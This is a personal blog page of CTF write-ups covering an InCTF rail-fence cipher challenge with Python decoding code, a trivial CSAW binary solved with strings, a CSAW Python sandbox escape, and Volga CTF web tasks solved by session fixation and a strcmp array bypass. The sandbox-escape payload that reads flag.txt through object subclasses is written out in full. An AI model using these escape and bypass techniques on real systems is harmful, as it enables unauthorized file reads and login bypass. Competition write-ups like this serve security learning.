Sunday 19 April 2015

InCTF 2015 Qualification Crypto Writeup - Crypto1

Before even jumping to challenges, get to know a little about InCTF. Do read my previous blog post about InCTF.

There was totally 4 cryptography challenges, but writing write up only for crypto-1, 2 and 4 as I was not the developer/designer for crypto-3.

Crypto1: 100 Points


Challenge: 

I found this sheet lying on the railway tracks and it seems to be encrypted in some form. Can you reveal the right intended text?


Text on sheet -
mgisd_fd_iuprhnedmfo5svqma_ureeer(eeeehl_sta_tYn__n_ustasyseoentenearlh)l_ar_ccxn-yclwsesnhodx_totib_i

Solution:

Looking at the cipher we can observe that it has only readable ascii character, so the characters are jumbled in some pattern or substituted with other characters.

There was hint in the Question itself: 'sheet lying in railway track'. So it might be Rail Fence Cipher aka ZigZag cipher.

Now the only challenge is to figure out the number of rails (key length) used in the cipher. Well it was easy brute forcible. Trying from 2-10 would have got the flag.

The key length was: 9

Plain text after decoding would be:
Plain text:
md5(Yellow_ones_give_eastern_equipment_since_harsh_lunchboxes_understand_x-rated_measly_itchy_efforts)

So the Flag would be : 58a1b42e43bff262735766c384033fe6

Python code for Rail Fence Cipher or Zig-Zag cipher:


def fence(lst, numrails):

    fence = [[None] * len(lst) for n in range(numrails)]

    rails = range(numrails - 1) + range(numrails - 1, 0, -1)

    for n, x in enumerate(lst):

        fence[rails[n % len(rails)]][n] = x



    if 0: # debug

        for rail in fence:

            print ''.join('.' if c is None else str(c) for c in rail)



    return [c for rail in fence for c in rail if c is not None]



def encode(text, n):

    return ''.join(fence(text, n))



def decode(text, n):

    rng = range(len(text))

    pos = fence(rng, n)

    return ''.join(text[pos.index(n)] for n in rng)





'''

Brute forcing through the keylength:
cipher = "mgisd_fd_iuprhnedmfo5svqma_ureeer(eeeehl_sta_tYn__n_ustasyseoentenearlh)l_ar_ccxn-yclwsesnhodx_totib_i"
print [decode(cipher, i) for i in range(2, 10)] '''
Thanks for reading through the post. 
Any suggestions/comments about this post, please let me know the comments section below. Looking forward for the suggestions.

Monday 22 September 2014

CSAW CTF 2014 Quals write-up


team r00t, we ended scoring 1250. None of the team members worked for more than half a day, and our team is small, containing 3 members. All lazy people :D

Exploitation - 1: bo



This was a simple problem, or we didn't know how to solve in the way it was meant to be.
As usual as soon as we saw a executable follow the usual procedure -

First, file type

> file bo
bo; ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
Second, look for strings-

> strings bo

When we look at the strings. Oh wait is it the flag. Hell Yeah :D

Welcome to CSAW CTF!

Time to break out IDA Demo and see what's going on inside me.  :]

flag{exploitation_is_easy!}

Exploitation - 2: pybabbies


nc 54.165.210.171 12345

Connect the server with that particular port, We found python console showing up.
Afterwards we opened the source file 

As we played around with the console
- Found its Python 3.x
- It does not show any returned value.
  workaround: Just print the return value.
- Any error the execution will close the connection.

Time to analyse the source code. All the cool module and functions where banned :'(

Checked if there is already a variable with flag or key etc having the flag. And obviously it wasnt that easy. So, maybe there is a file with flag.txt or key.txt where the flag is and we have to open it.

As I have already read few blog posts about escaping Python sandbox, It was easy.

Playing around with tuple. Ended with an interesting part -

>>> print(().__class__.__bases__[0].__subclasses__()[40])

<type 'file'>

Now its obvious try opening flag.txt key.txt etc

>>> print(().__class__.__bases__[0].__subclasses__()[40]("flag.txt"))

<open file 'flag', mode 'r' at 0x.....>

Wow!!! It worked. Now just go ahead and read the file

Welcome to my Python sandbox! Enter commands below!
>>> print(().__class__.__bases__[0].__subclasses__()[40]('flag.txt').read())

flag{definitely_not_intro_python}

>>> exit



Thanks for reading through the write-up. If any thing wrong or can be added to this post. Please put them in the comments :)


Saturday 19 July 2014

Volga CTF quals 2014

Team r00t managed only 700 points and secured 80th position

This was 1 really son of a difficult CTF

Web100-

If login successful, You will be given a particular phpsession.
Login was easy. you enter random name and it will get registered and access will be given.

Task was Session fixation.

After login in. In source we can see help.php


In link place give your link to the page where the session id is assigned.

and refresh the loged in page.

flag: Easy_task_on_Session_Fixation

Comments are welcomed...
Question solving skill: x7r0n

Web200-

Guess they where using strcmp function to password.
Change password to array elements.


response for the above request [image]

I don't know whether this is how challenge was made to be solved. But this shit worked :D

Comments are welcomed :)